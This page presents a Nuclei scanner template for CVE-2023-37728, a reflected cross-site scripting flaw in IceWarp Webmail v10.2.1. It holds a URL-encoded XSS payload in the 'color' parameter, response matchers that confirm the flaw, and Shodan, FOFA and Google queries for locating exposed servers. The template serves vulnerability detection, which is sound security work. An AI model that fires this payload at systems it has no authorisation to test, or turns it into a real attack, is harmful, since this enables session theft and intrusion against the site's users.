Skip to content

IceWarp Webmail Server v10.2.1 - Cross Site Scripting

ID: CVE-2023-37728

Severity: medium

Author: technicaljunkie,r3Y3r53

Tags: cve,cve2023,icearp,icewarp,xss

Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.

id: CVE-2023-37728
info:
name: IceWarp Webmail Server v10.2.1 - Cross Site Scripting
author: technicaljunkie,r3Y3r53
severity: medium
description: |
Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
reference:
- https://medium.com/@ayush.engr29/cve-2023-37728-6dfb7586311
- https://nvd.nist.gov/vuln/detail/CVE-2023-37728
- http://icearp.com
- http://icewarp.com
- https://medium.com/%40ayush.engr29/cve-2023-37728-6dfb7586311
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-37728
cwe-id: CWE-79
epss-score: 0.0035
epss-percentile: 0.71791
cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: icewarp
product: icewarp
shodan-query:
- http.favicon.hash:2144485375
- http.title:"icewarp"
fofa-query:
- title="icewarp"
- icon_hash=2144485375
google-query: intitle:"icewarp"
tags: cve,cve2023,icearp,icewarp,xss
http:
- method: GET
path:
- "{{BaseURL}}/webmail/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
- "{{BaseURL}}/?color=%22%3e%3cimg%20src%20onerror%3dalert(document.domain)%3e%3c%22%27"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(header, "IceWarp") || contains(body, "IceWarp WebClient")'
- 'contains(body, "<img src onerror=alert(document.domain)>")'
condition: and
# digest: 490a004630440220277224bfe2ea9bafc05f33d0f907b90a8236ab20d75c39caf425448cd05299d202200c3b2a9f49a80731aef7b3281e6be9007eacd9b2f595ef922d637b5df6f88144:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-37728.yaml"

View on Github